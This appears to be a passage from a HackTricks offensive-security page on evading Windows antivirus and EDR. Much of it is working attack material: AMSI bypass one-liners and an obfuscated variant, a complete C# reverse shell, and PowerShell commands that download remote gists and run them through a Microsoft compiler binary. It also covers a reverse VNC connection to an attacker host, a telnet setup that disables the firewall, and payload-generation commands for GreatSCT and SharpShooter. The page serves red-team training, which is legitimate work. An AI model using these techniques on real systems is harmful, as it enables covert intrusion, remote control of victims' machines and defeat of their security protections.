Copy
5. Create a new visual studio project (C++ DLL), paste the code generated by SharpDLLProxy (Under output_dllname/dllname_pragma.c) and compile. Now you should have a proxy dll which will load the shellcode you've specified and also forward any calls to the original DLL.
These are the results:
Both our shellcode (encoded with SGN) and the proxy DLL have a 0/26 Detection
rate in antiscan.me! I would call that a success.
I highly recommend you watch S3cur3Th1sSh1t's twitch VOD about DLL Sideloading
and also ippsec's video to learn more about what we've discussed more in-depth.
FREEZE
Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct
syscalls, and alternative execution methods
You can use Freeze to load and execute your shellcode in a stealthy manner.
Copy
Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freeze.git && cd Freeze && go build Freeze.go)
1. Generate some shellcode, in this case I used Havoc C2.
2. ./Freeze -I demon.bin -encrypt -O demon.exe
3. Profit, no alerts from defender
Evasion is just a cat & mouse game, what works today could be detected tomorrow,
so never rely on only one tool, if possible, try chaining multiple evasion
techniques.
AMSI (ANTI-MALWARE SCAN INTERFACE)
AMSI was created to prevent "fileless malware". Initially, AVs were only capable
of scanning files on disk, so if you could somehow execute payloads directly
in-memory, the AV couldn't do anything to prevent it, as it didn't have enough
visibility.
The AMSI feature is integrated into these components of Windows.
* User Account Control, or UAC (elevation of EXE, COM, MSI, or ActiveX
installation)
* PowerShell (scripts, interactive use, and dynamic code evaluation)
* Windows Script Host (wscript.exe and cscript.exe)
* JavaScript and VBScript
* Office VBA macros
It allows antivirus solutions to inspect script behavior by exposing script
contents in a form that is both unencrypted and unobfuscated.
Running IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')
will produce the following alert on Windows Defender.
Notice how it prepends amsi: and then the path to the executable from which the
script ran, in this case, powershell.exe
We didn't drop any file to disk, but still got caught in-memory because of AMSI.
There are a couple of ways to get around AMSI:
* Obfuscation
Since AMSI mainly works with static detections, therefore, modifying the scripts
you try to load can be a good way for evading detection.
However, AMSI has the capability of unobfuscating scripts even if it has
multiple layers, so obfuscation could be a bad option depending on how it's
done. This makes it not-so-straightforward to evade. Although, sometimes, all
you need to do is change a couple of variable names and you'll be good, so it
depends on how much something has been flagged.
* AMSI Bypass
Since AMSI is implemented by loading a DLL into the powershell (also
cscript.exe, wscript.exe, etc.) process, it's possible to tamper with it easily
even running as an unprivileged user. Due to this flaw in the implementation of
AMSI, researchers have found multiple ways to evade AMSI scanning.
Forcing an Error
Forcing the AMSI initialization to fail (amsiInitFailed) will result that no
scan will be initiated for the current process. Originally this was disclosed by
Matt Graeber and Microsoft has developed a signature to prevent wider usage.
Copy
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
All it took was one line of powershell code to render AMSI unusable for the
current powershell process. This line has of course been flagged by AMSI itself,
so some modification is needed in order to use this technique.
Here is a modified AMSI bypass I took from this Github Gist.
Copy
Try{#Ams1 bypass technic nº 2
$Xdatabase = 'Utils';$Homedrive = 'si'
$ComponentDeviceId = "N`onP" + "ubl`ic" -join ''
$DiskMgr = 'Syst+@.M£n£g' + 'e@+nt.Auto@' + '£tion.A' -join ''
$fdx = '@ms' + '£In£' + 'tF@£' + 'l+d' -Join '';Start-Sleep -Milliseconds 300
$CleanUp = $DiskMgr.Replace('@','m').Replace('£','a').Replace('+','e')
$Rawdata = $fdx.Replace('@','a').Replace('£','i').Replace('+','e')
$SDcleanup = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $CleanUp,$Homedrive,$Xdatabase))
$Spotfix = $SDcleanup.GetField($Rawdata,"$ComponentDeviceId,Static")
$Spotfix.SetValue($null,$true)
}Catch{Throw $_}
Keep in mind, that this will probably get flagged once this post comes out, so
you should not publish any code if your plan is staying undetected.
Memory Patching
This technique was initially discovered by @RastaMouse and it involves finding
address for the "AmsiScanBuffer" function in amsi.dll (responsible for scanning
the user-supplied input) and overwriting it with instructions to return the code
for E_INVALIDARG, this way, the result of the actual scan will return 0, which
is interpreted as a clean result.
Please read https://rastamouse.me/memory-patching-amsi-bypass/ for a more
detailed explanation.
There are also many other techniques used to bypass AMSI with powershell, check
out this page and this repo to learn more about them.
Or this script taht via memory patching will patch each new Powersh
OBFUSCATION
There are several tools that can be used to obfuscate C# clear-text code,
generate metaprogramming templates to compile binaries or obfuscate compiled
binaries such as:
* InvisibilityCloak: C# obfuscator
* Obfuscator-LLVM: The aim of this project is to provide an open-source fork of
the LLVM compilation suite able to provide increased software security
through code obfuscation and tamper-proofing.
* ADVobfuscator: ADVobfuscator demonstates how to use C++11/14 language to
generate, at compile time, obfuscated code without using any external tool
and without modifying the compiler.
* obfy: Add a layer of obfuscated operations generated by the C++ template
metaprogramming framework which will make the life of the person wanting to
crack the application a little bit harder.
* Alcatraz: Alcatraz is a x64 binary obfuscator that is able to obfuscate
various different pe files including: .exe, .dll, .sys
* metame: Metame is a simple metamorphic code engine for arbitrary executables.
* ropfuscator: ROPfuscator is a fine-grained code obfuscation framework for
LLVM-supported languages using ROP (return-oriented programming). ROPfuscator
obfuscates a program at the assembly code level by transforming regular
instructions into ROP chains, thwarting our natural conception of normal
control flow.
* Nimcrypt: Nimcrypt is a .NET PE Crypter written in Nim
* inceptor: Inceptor is able to convert existing EXE/DLL into shellcode and
then load them
SMARTSCREEN & MOTW
You may have seen this screen when downloading some executables from the
internet and executing them.
Microsoft Defender SmartScreen is a security mechanism intended to protect the
end user against running potentially malicious applications.
SmartScreen mainly works with a reputation-based approach, meaning that
uncommonly download applications will trigger SmartScreen thus alerting and
preventing the end user from executing the file (although the file can still be
executed by clicking More Info -> Run anyway).
MoTW (Mark of The Web) is an NTFS Alternate Data Stream with the name of
Zone.Identifier which is automatically created upon download files from the
internet, along with the URL it was downloaded from.
Checking the Zone.Identifier ADS for a file downloaded from the internet.
It's important to note that executables signed with a trusted signing
certificate won't trigger SmartScreen.
A very effective way to prevent your payloads from getting the Mark of The Web
is by packaging them inside some sort of container like an ISO. This happens
because Mark-of-the-Web (MOTW) cannot be applied to non NTFS volumes.
PackMyPayload is a tool that packages payloads into output containers to evade
Mark-of-the-Web.
Example usage:
Copy
PS C:\Tools\PackMyPayload> python .\PackMyPayload.py .\TotallyLegitApp.exe container.iso
+ o + o + o + o
+ o + + o + +
o + + + o + + o
-_-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-_-_-_-_-_-_-_,------, o
:: PACK MY PAYLOAD (1.1.0) -_-_-_-_-_-_-| /\_/\
for all your container cravings -_-_-_-_-_-~|__( ^ .^) + +
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-__-_-_-_-_-_-_-'' ''
+ o o + o + o o + o
+ o + o ~ Mariusz Banach / mgeeky o
o ~ + ~ <mb [at] binary-offensive.com>
o + o + +
[.] Packaging input file to output .iso (iso)...
Burning file onto ISO:
Adding file: /TotallyLegitApp.exe
[+] Generated file written to (size: 3420160): container.iso
Here is a demo for bypassing SmartScreen by packaging payloads inside ISO files
using PackMyPayload
C# ASSEMBLY REFLECTION
Loading C# binaries in memory has been known for quite some time and it's still
a very great way for running your post-exploitation tools without getting caught
by AV.
Since the payload will get loaded directly into memory without touching disk, we
will only have to worry about patching AMSI for the whole process.
Most C2 frameworks (sliver, Covenant, metasploit, CobaltStrike, Havoc, etc.)
already provide the ability to execute C# assemblies directly in memory, but
there are different ways of doing so:
* Fork&Run
It involves spawning a new sacrificial process, inject your post-exploitation
malicious code into that new process, execute your malicious code and when
finished, kill the new process. This has both its benefits and its drawbacks.
The benefit to the fork and run method is that execution occurs outside our
Beacon implant process. This means that if something in our post-exploitation
action goes wrong or gets caught, there is a much greater chance of our implant
surviving. The drawback is that you have a greater chance of getting caught by
Behavioural Detections.
* Inline
It's about injecting the post-exploitation malicious code into its own process.
This way, you can avoid having to create a new process and getting it scanned by
AV, but the drawback is that if something goes wrong with the execution of your
payload, there's a much greater chance of losing your beacon as it could crash.
If you want to read more about C# Assembly loading, please check out this
article
https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/ and
their InlineExecute-Assembly BOF
(https://github.com/xforcered/InlineExecute-Assembly)
You can also load C# Assemblies from PowerShell, check out Invoke-SharpLoader
and S3cur3th1sSh1t's video.
USING OTHER PROGRAMMING LANGUAGES
As proposed in https://github.com/deeexcee-io/LOI-Bins, it's possible to execute
malicious code using other languages by giving the compromised machine access to
the interpreter environment installed on the Attacker Controlled SMB share.
By allowing access to the Interpreter Binaries and the environment on the SMB
share you can execute arbitrary code in these languages within memory of the
compromised machine.
The repo indicates: Defender still scans the scripts but by utilising Go, Java,
PHP etc we have more flexibility to bypass static signatures. Testing with
random un-obfuscated reverse shell scripts in these languages has proved
successful.
ADVANCED EVASION
Evasion is a very complicated topic, sometimes you have to take into account
many different sources of telemetry in just one system, so it's pretty much
impossible to stay completely undetected in mature environments.
Every environment you go against will have their own strengths and weaknesses.
I highly encourage you go watch this talk from @ATTL4S, to get a foothold into
more Advanced Evasion techniques.
his is also another great talk from @mariuszbit about Evasion in Depth.
OLD TECHNIQUES
CHECK WHICH PARTS DEFENDER FINDS AS MALICIOUS
You can use ThreatCheck which will remove parts of the binary until it finds out
which part Defender is finding as malicious and split it to you. Another tool
doing the same thing is avred with an open web offering the service in
https://avred.r00ted.ch/
TELNET SERVER
Until Windows10, all Windows came with a Telnet server that you could install
(as administrator) doing:
Copy
pkgmgr /iu:"TelnetServer" /quiet
Make it start when the system is started and run it now:
Copy
sc config TlntSVR start= auto obj= localsystem
Change telnet port (stealth) and disable firewall:
Copy
tlntadmn config port=80
netsh advfirewall set allprofiles state off
ULTRAVNC
Download it from: http://www.uvnc.com/downloads/ultravnc.html (you want the bin
downloads, not the setup)
ON THE HOST: Execute winvnc.exe and configure the server:
* Enable the option Disable TrayIcon
* Set a password in VNC Password
* Set a password in View-Only Password
Then, move the binary winvnc.exe and newly created file UltraVNC.ini inside the
victim
REVERSE CONNECTION
The attacker should execute inside his host the binary vncviewer.exe -listen
5900 so it will be prepared to catch a reverse VNC connection. Then, inside the
victim: Start the winvnc daemon winvnc.exe -run and run winwnc.exe
[-autoreconnect] -connect <attacker_ip>::5900
WARNING: To maintain stealth you must not do a few things
* Don't start winvnc if it's already running or you'll trigger a popup. check
if it's running with tasklist | findstr winvnc
* Don't start winvnc without UltraVNC.ini in the same directory or it will
cause the config window to open
* Don't run winvnc -h for help or you'll trigger a popup
GREATSCT
Download it from: https://github.com/GreatSCT/GreatSCT
Copy
git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT/setup/
./setup.sh
cd ..
./GreatSCT.py
Inside GreatSCT:
Copy
use 1
list #Listing available payloads
use 9 #rev_tcp.py
set lhost 10.10.14.0
sel lport 4444
generate #payload is the default name
#This will generate a meterpreter xml and a rcc file for msfconsole
Now start the lister with msfconsole -r file.rc and execute the xml payload
with:
Copy
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
Current defender will terminate the process very fast.
COMPILING OUR OWN REVERSE SHELL
https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
FIRST C# REVERSHELL
Compile it with:
Copy
c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt
Use it with:
Copy
back.exe <ATTACKER_IP> <PORT>
Copy
// From https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple_Rev_Shell.cs
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
namespace ConnectBack
{
public class Program
{
static StreamWriter streamWriter;
public static void Main(string[] args)
{
using(TcpClient client = new TcpClient(args[0], System.Convert.ToInt32(args[1])))
{
using(Stream stream = client.GetStream())
{
using(StreamReader rdr = new StreamReader(stream))
{
streamWriter = new StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true)
{
strInput.Append(rdr.ReadLine());
//strInput.Append("\n");
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
}
catch (Exception err) { }
}
}
}
}
C# USING COMPILER
Copy
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt
REV.txt: https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066
REV.shell: https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639
Automatic download and execution:
Copy
64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
32bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
C# obfuscators list: https://github.com/NotPrab/.NET-Obfuscator
C++
Copy
sudo apt-get install mingw-w64
i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
* https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp
* https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/
* https://www.blackhat.com/docs/us-16/materials/us-16-Mittal-AMSI-How-Windows-10-Plans-To-Stop-Script-Based-Attacks-And-How-Well-It-Does-It.pdf
* https://github.com/l0ss/Grouper2
* http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html
* http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/
USING PYTHON FOR BUILD INJECTORS EXAMPLE:
* https://github.com/cocomelonc/peekaboo
OTHER TOOLS
Copy
# Veil Framework:
https://github.com/Veil-Framework/Veil
# Shellter
https://www.shellterproject.com/download/
# Sharpshooter
# https://github.com/mdsecactivebreach/SharpShooter
# Javascript Payload Stageless:
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
# Stageless HTA Payload:
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
# Staged VBS:
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
# Donut:
https://github.com/TheWover/donut
# Vulcan
https://github.com/praetorian-code/vulcan
MORE
* https://github.com/persianhydra/Xeexe-TopAntivirusEvasion
If you are interested in hacking career and hack the unhackable - we are hiring!
(fluent polish written and spoken required).
Careers | stmcyber.com | penetration testingstmcyber.com
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
* Check the subscription plans!
* Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦
@hacktricks_live.
* Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud
github repos.
PreviousPowerView/SharpViewNextAndroid APK Checklist
Last updated 26 days ago
This site uses cookies to deliver its service and to analyse traffic. By
browsing this site, you accept the privacy policy.
AcceptReject